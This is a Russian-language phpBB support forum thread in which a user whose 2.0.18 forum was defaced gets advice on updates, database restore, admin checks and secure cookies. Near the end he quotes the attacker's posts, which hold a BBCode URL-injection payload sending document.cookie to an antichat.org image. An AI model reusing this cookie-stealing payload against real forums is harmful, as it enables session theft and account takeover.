Взломали 2.0.18

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
bas
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет 2 месяца

Взломали 2.0.18

Сообщение bas »

Пришел утром на форум а там написано " Hacked by....."
Форум последней версии - 2.0.18. Никаких модов не стояло, кроме "Быстрого ответа" и "внешний вид - PS2". Может кто поможет советом, как избежать подобных "радостей"? Посмотрел на файлы - ничего лишнего пока не нашел ( может удалили).
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 21 год 2 месяца
Поблагодарили: 2 раза

Сообщение Xpert »

Форум изначально был последней версии? Если нет, как вы его обновляли, опишите пошагово.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
bas
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет 2 месяца

Сообщение bas »

Форум был 2.0.17 Обновил так - скопировал файлы обновления 2.0.18 в каталог с форумом, запустил файл update_to_latest.php.
А сейчас не могу восстановить базу! Пишет Warning: upload_max_filesize of 2097152 bytes exceeded - file [backup_file=E:\phpBB2\phpbb_db_backup.sql] not saved in Unknown on line 0
Файл на диске занимает 5 Мег. Я так понял, что максимально возможный развер фала 2Мега. Как увеличить до 5? Спасибо.

Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел, удалили форумы и написали " свой привет". Лишних файлов не нашел. Либо их не было, либо удалили.
Аватара пользователя
VVVas
Former team member
Сообщения: 4463
Стаж: 20 лет 6 месяцев
Поблагодарили: 1 раз

Сообщение VVVas »

bas писал(а):скопировал файлы обновления 2.0.18 в каталог с форумом, запустил файл update_to_latest.php.
Поздравляю вас - вы обновили только БД.
Никогда не пробовали читать документацию, а? К тому же обновлению, а?

Добавлено спустя 1 минуту 26 секунд:
bas писал(а):Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел
Вы слегка подумайте над тем что пишете. Как можно залезть в админку не будучи админом?
я люблю daft punk | новый sugoi.ru
bas
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет 2 месяца

Сообщение bas »

VVVas
А как залезали в предудущих версиях? Если были косяки в куках/сессиях? Просто подменяли их - и все!
А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!
Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?
Аватара пользователя
VVVas
Former team member
Сообщения: 4463
Стаж: 20 лет 6 месяцев
Поблагодарили: 1 раз

Сообщение VVVas »

bas писал(а):А как залезали в предудущих версиях?
Читайте об этом сами - я не собираюсь вам это пересказывать.
bas писал(а):А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!
Может просто пожалели. Либо базу пользователей с мылами утянули и спамерам слили. Если с вашей точки зрения что-то бессмыслено - попробуйте думать с другой точки зрения, а так же расширьте уровень своего восприятия и не отбрасывайте некоторые факты. И с чего вы взяли что не напихали?
bas писал(а):Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?
Идите в поиск - обсуждалось.
http://www.phpbbguru.net/community/viewtopic.php?t=861

Тема закрыта.

PS Вот так и получается что форум дырявый - руки просто у некоторых дырявые.
я люблю daft punk | новый sugoi.ru
bas
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет 2 месяца

Взломали 2.0.18 часть 2

Сообщение bas »

Удалил форум! ВСЕ!!! Оставил только базы! Скачал последний дистрибутив! Установил. Восстановил базу данных! Через час - опять надпись " Типа хакнули". Ну, что скажете?
Вот кстати об этом написано тут - http://adminam.net Речь идет про мой форум http://chat.ntsi1.com/forum
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 10 месяцев
Откуда: Бердск

Сообщение crash »

оставили помоему вам гдето файлик, через который вас имеют.. проверьте все файлы, которые лежат на фтп.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
VVVas
Former team member
Сообщения: 4463
Стаж: 20 лет 6 месяцев
Поблагодарили: 1 раз

Сообщение VVVas »

Значит чего-то вы делаете не так.
Пароли меняли перед этим? Левых админов проверяли?
я люблю daft punk | новый sugoi.ru
bas
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет 2 месяца

Сообщение bas »

VVVas
"Левых" админов проверил сразу..пароль сменил....
crash
Я проверил - "левых" файлов не обнаружено, или они не на моем сервере.
Про безопасные куки расскажите?
Аватара пользователя
avm
Former team member
Сообщения: 582
Стаж: 20 лет 3 месяца
Откуда: Москва

Сообщение avm »

Код: Выделить всё

bool setcookie ( string name [, string value [, int expire [, string path [, string domain [, bool secure]]]]] )
http://php.rinet.ru/manual/ru/function.setcookie.php писал(а):secure - Indicates that the cookie should only be transmitted over a secure HTTPS connection. When set to TRUE, the cookie will only be set if a secure connection exists. The default is FALSE
Если вы действительно хотите выяснить что происходит, ответьте сначала на вопросы:
1) вы знаете этого человека Slash [IFF]? не живет ли он где-то недалеко от вас и не подключен ли к той же сети что и вы?
2) код форума вы залили с нуля, а базу восстановили старую? проверяли ли вы ее перед восстановлением на локальном хосте на нежелательные вложения?
3) в какой момент и как именно вы проверяли "левых админов"?
4) какие моды были установлены когда ваш форум был 2.0.17 (ну тоесть до того как вы полностью перезалили новый код)?
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
CJ John PM
phpBB 1.4.1
Сообщения: 46
Стаж: 20 лет 4 месяца

Сообщение CJ John PM »

bas, кстати, глянь в таблицу пользователей, может там где-то хрен с админскими правами прописался.
Аватара пользователя
avm
Former team member
Сообщения: 582
Стаж: 20 лет 3 месяца
Откуда: Москва

Сообщение avm »

CJ John PM, написано же:
bas писал(а):"Левых" админов проверил сразу..пароль сменил....
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
bas
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет 2 месяца

Сообщение bas »

Вчера отмечали НГ, было не до него (Slash [IFF]). А вот сегодня посмотрел за ним...Вот что он писал:
1) Хм...
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url} Видно только "Хм..."

2) Всех с Новым Годом!
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url}

В общем, ничего нового....залезают через дырки в форуме... Я же говорил черезе куки! :-) Эх phpBB phpBB.....

CJ John Этот хрен в юзерах сидит...Админских прав у него нет. Я пока его оставил, в какой то степени он мне помогает. Всех с новым годом!
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 10 месяцев
Откуда: Бердск

Сообщение crash »

bas
вообщето это глюк ИЕ, потому как больше нигде этот код не работает.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса

Вернуться в «Поддержка phpBB 2.0.x»